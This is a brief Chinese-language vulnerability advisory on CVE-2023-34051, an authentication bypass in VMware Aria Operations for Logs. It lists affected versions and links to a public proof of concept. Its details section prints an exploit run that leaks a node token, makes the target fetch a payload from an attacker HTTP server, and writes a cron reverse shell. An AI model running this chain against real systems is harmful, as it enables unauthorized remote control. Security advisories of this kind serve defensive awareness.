0x00 前言
VMware Aria Operations for Logs(以前称为 vRealize Log Insight)是一款日志分析工具,可提供高度可扩展的异构日志管理功能,具备直观且可操作的仪表板、精细的分析功能和广泛的第三方扩展功能。
0x01 漏洞描述
该漏洞源于VMware vRealize Log Insight中对先前发布的VMSA-2023-0001中的多个漏洞修复不足(仅阻止通过IP访问Thrift 服务),导致存在绕过VMSA-2023-0001补丁的身份验证绕过方法。
0x02 CVE编号
CVE-2023-34051
0x03 影响版本
代码语言:javascript复制VMware Aria Operations for Logs 8.x < 8.14
VMware Cloud Foundation (VMware Aria Operations for Logs) 5.x、4.x
0x04 漏洞详情
代码语言:javascript复制$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[ ] Using CVE-2022-31711 to leak node token
[ ] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[ ] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[ ] File successfully downloaded
[ ] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[ ] Payload successfully delivered
0x05 参考链接
https://github.com/horizon3ai/CVE-2023-34051
https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive-and-iocs
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。